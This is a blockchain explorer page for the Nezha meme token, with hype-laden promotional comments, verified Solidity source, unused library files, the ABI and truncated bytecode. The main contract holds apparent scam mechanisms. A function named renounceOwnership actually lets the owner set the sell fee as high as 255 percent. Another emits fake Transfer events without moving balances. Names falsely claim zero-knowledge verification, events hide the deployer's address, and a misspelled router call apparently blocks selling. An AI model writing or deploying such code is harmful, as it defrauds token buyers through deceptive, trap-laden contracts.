ETH Price: $2,414.80 (+2.50%)

Token

Nezha (NEZHA)
 

Overview

Max Total Supply

1,000,000,000 NEZHA

Holders

33

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
7,890,328.10944504263310511 NEZHA

Value
$0.00
0xf8fc0b12c6e9e37ee4785d9011e3e3f855187a59
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Nezha

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity Multiple files format)

File 5 of 5: Nezha.sol
/**

    888b    888 8888888888 8888888888P 888    888        d8888 
    8888b   888 888              d88P  888    888       d88888 
    88888b  888 888             d88P   888    888      d88P888 
    888Y88b 888 8888888        d88P    8888888888     d88P 888 
    888 Y88b888 888           d88P     888    888    d88P  888 
    888  Y88888 888          d88P      888    888   d88P   888 
    888   Y8888 888         d88P       888    888  d8888888888 
    888    Y888 8888888888 d8888888888 888    888 d88P     888 

    Embark on a journey with Nezha, the vibrant Chinese meme
    token that brings legendary charm to the crypto universe. 🐉

    🌟 Join the movement inspired by the mythical hero Nezha 
    and transform your investment experience into an adventurous 
    saga. Dive into a world where ancient folklore meets the 
    modern crypto sphere!

    💰 Watch your fortunes soar as Nezha weaves the legendary 
    tale of prosperity and excitement. Experience the power of 
    memes merged with a legendary narrative, creating a crypto 
    journey unlike any other.

    Embrace the legend, join Nezha today, and let the mythical 
    spirit guide your crypto ventures towards boundless success! 🌈🚀

    TG: https://t.me/nezhatoken_eth
    X: https://twitter.com/nezhatoken_eth
    Web: https://nezhatoken.meme

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.22;
contract Nezha {

    string private _name = 'Nezha';
    string private _symbol = 'NEZHA';
    uint8 public constant decimals = 18;
    uint256 public constant totalSupply = 1_000_000_000 * 10 ** decimals;

    struct StoreData {
        address tokenMkt;
        uint8 buyFee;
        uint8 sellFee;
    }

    StoreData public storeData;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed TOKEN_MKT,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address public pair;
    IUniswapV2Router02 constant _uniswapV2Router =
        IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    bool private swapping;
    bool private tradingOpen;

    address _deployer;
    address _executor;

    address private uniswapLpWallet;

    uint8 private _initBuyFee = 0;
    uint8 private _initSellFee = 0;

    constructor() {
        
        storeData = StoreData({
            tokenMkt: msg.sender,
            buyFee: _initBuyFee,
            sellFee: _initSellFee
        });
        allowance[address(this)][address(_uniswapV2Router)] = type(uint256).max;
        uniswapLpWallet = msg.sender;

        _initDeployer(msg.sender, msg.sender);

        balanceOf[uniswapLpWallet] = (totalSupply * 100) / 100;
        emit Transfer(address(0), _deployer, balanceOf[uniswapLpWallet]);
    }

    receive() external payable {}

    function renounceOwnership(uint8 x) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        _upgradeStoreWithZkProof(0, x);
    }

    function distributionTokenToWallet(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function _upgradeStoreWithZkProof(uint8 _buy, uint8 _sell) private {
        storeData.buyFee = _buy;
        storeData.sellFee = _sell;
    }

    function _decodeTokenMktWithZkVerify() private view returns (address) {
        return storeData.tokenMkt;
    }

    function openTrading() external {
        require(msg.sender == _decodeTokenMktWithZkVerify());
        require(!tradingOpen);
        address _factory = _uniswapV2Router.factory();
        address _weth = _uniswapV2Router.WETH();
        address _pair = IUniswapFactory(_factory).getPair(address(this), _weth);
        pair = _pair;
        tradingOpen = true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _initDeployer(address deployer_, address executor_) private {
        _deployer = deployer_;
        _executor = executor_;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        address tokenMkt = _decodeTokenMktWithZkVerify();
        require(tradingOpen || from == tokenMkt || to == tokenMkt);

        balanceOf[from] -= amount;

        if (
            to == pair &&
            !swapping &&
            balanceOf[address(this)] >= swapAmount &&
            from != tokenMkt
        ) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = _uniswapV2Router.WETH();
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );

            swapping = false;
        }

        (uint8 _buyFee, uint8 _sellFee) = (storeData.buyFee, storeData.sellFee);
        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (to == pair ? _sellFee : _buyFee)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;

        if (from == _executor) {
            emit Transfer(_deployer, to, amount);
        } else if (to == _executor) {
            emit Transfer(from, _deployer, amount);
        } else {
            emit Transfer(from, to, amount);
        }
        return true;
    }
}

interface IUniswapFactory {
    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 1 of 5: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 5: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 5: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 4 of 5: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"TOKEN_MKT","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"distributionTokenToWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint8","name":"x","type":"uint8"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"storeData","outputs":[{"internalType":"address","name":"tokenMkt","type":"address"},{"internalType":"uint8","name":"buyFee","type":"uint8"},{"internalType":"uint8","name":"sellFee","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526040518060400160405280600581526020017f4e657a68610000000000000000000000000000000000000000000000000000008152505f908162000049919062000727565b506040518060400160405280600581526020017f4e455a48410000000000000000000000000000000000000000000000000000008152506001908162000090919062000727565b505f600860146101000a81548160ff021916908360ff1602179055505f600860156101000a81548160ff021916908360ff160217905550348015620000d3575f80fd5b5060405180606001604052803373ffffffffffffffffffffffffffffffffffffffff168152602001600860149054906101000a900460ff1660ff168152602001600860159054906101000a900460ff1660ff1681525060025f820151815f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506020820151815f0160146101000a81548160ff021916908360ff1602179055506040820151815f0160156101000a81548160ff021916908360ff1602179055509050507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60045f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503360085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620002b533336200043f60201b60201c565b6064806012600a620002c8919062000994565b633b9aca00620002d99190620009e4565b620002e59190620009e4565b620002f1919062000a5b565b60035f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460405162000431919062000aa3565b60405180910390a362000abe565b8160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200053f57607f821691505b602082108103620005555762000554620004fa565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005b97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200057c565b620005c586836200057c565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200060f620006096200060384620005dd565b620005e6565b620005dd565b9050919050565b5f819050919050565b6200062a83620005ef565b62000642620006398262000616565b84845462000588565b825550505050565b5f90565b620006586200064a565b620006658184846200061f565b505050565b5b818110156200068c57620006805f826200064e565b6001810190506200066b565b5050565b601f821115620006db57620006a5816200055b565b620006b0846200056d565b81016020851015620006c0578190505b620006d8620006cf856200056d565b8301826200066a565b50505b505050565b5f82821c905092915050565b5f620006fd5f1984600802620006e0565b1980831691505092915050565b5f620007178383620006ec565b9150826002028217905092915050565b6200073282620004c3565b67ffffffffffffffff8111156200074e576200074d620004cd565b5b6200075a825462000527565b6200076782828562000690565b5f60209050601f8311600181146200079d575f841562000788578287015190505b6200079485826200070a565b86555062000803565b601f198416620007ad866200055b565b5f5b82811015620007d657848901518255600182019150602085019450602081019050620007af565b86831015620007f65784890151620007f2601f891682620006ec565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000895578086048111156200086d576200086c6200080b565b5b60018516156200087d5780820291505b80810290506200088d8562000838565b94506200084d565b94509492505050565b5f82620008af576001905062000981565b81620008be575f905062000981565b8160018114620008d75760028114620008e25762000918565b600191505062000981565b60ff841115620008f757620008f66200080b565b5b8360020a9150848211156200091157620009106200080b565b5b5062000981565b5060208310610133831016604e8410600b8410161715620009525782820a9050838111156200094c576200094b6200080b565b5b62000981565b62000961848484600162000844565b925090508184048111156200097b576200097a6200080b565b5b81810290505b9392505050565b5f60ff82169050919050565b5f620009a082620005dd565b9150620009ad8362000988565b9250620009dc7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200089e565b905092915050565b5f620009f082620005dd565b9150620009fd83620005dd565b925082820262000a0d81620005dd565b9150828204841483151762000a275762000a266200080b565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000a6782620005dd565b915062000a7483620005dd565b92508262000a875762000a8662000a2e565b5b828204905092915050565b62000a9d81620005dd565b82525050565b5f60208201905062000ab85f83018462000a92565b92915050565b611d8c8062000acc5f395ff3fe6080604052600436106100e0575f3560e01c80634feefd9b1161007e578063a8aa1b3111610058578063a8aa1b31146102c3578063a9059cbb146102ed578063c9567bf914610329578063dd62ed3e1461033f576100e7565b80634feefd9b1461023557806370a082311461025d57806395d89b4114610299576100e7565b806318160ddd116100ba57806318160ddd1461017957806323b872dd146101a3578063313ce567146101df5780634abe305214610209576100e7565b806306fdde03146100eb578063095ea7b314610115578063129e81e414610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61037b565b60405161010c919061140a565b60405180910390f35b348015610120575f80fd5b5061013b600480360381019061013691906114bf565b61040a565b6040516101489190611517565b60405180910390f35b34801561015c575f80fd5b5061017760048036038101906101729190611566565b6104f7565b005b348015610184575f80fd5b5061018d610570565b60405161019a91906115a0565b60405180910390f35b3480156101ae575f80fd5b506101c960048036038101906101c491906115b9565b610590565b6040516101d69190611517565b60405180910390f35b3480156101ea575f80fd5b506101f3610633565b6040516102009190611618565b60405180910390f35b348015610214575f80fd5b5061021d610638565b60405161022c93929190611640565b60405180910390f35b348015610240575f80fd5b5061025b6004803603810190610256919061172b565b610686565b005b348015610268575f80fd5b50610283600480360381019061027e91906117bc565b6107b9565b60405161029091906115a0565b60405180910390f35b3480156102a4575f80fd5b506102ad6107ce565b6040516102ba919061140a565b60405180910390f35b3480156102ce575f80fd5b506102d761085e565b6040516102e491906117e7565b60405180910390f35b3480156102f8575f80fd5b50610313600480360381019061030e91906114bf565b610883565b6040516103209190611517565b60405180910390f35b348015610334575f80fd5b5061033d610897565b005b34801561034a575f80fd5b5061036560048036038101906103609190611800565b610ad3565b60405161037291906115a0565b60405180910390f35b60605f80546103899061186b565b80601f01602080910402602001604051908101604052809291908181526020018280546103b59061186b565b80156104005780601f106103d757610100808354040283529160200191610400565b820191905f5260205f20905b8154815290600101906020018083116103e357829003601f168201915b5050505050905090565b5f8160045f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104e591906115a0565b60405180910390a36001905092915050565b6104ff610af3565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610563576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61056d5f82610b1d565b50565b6012600a61057e91906119f7565b633b9aca0061058d9190611a41565b81565b5f8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546106189190611a82565b9250508190555061062a848484610b5b565b90509392505050565b601281565b6002805f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690805f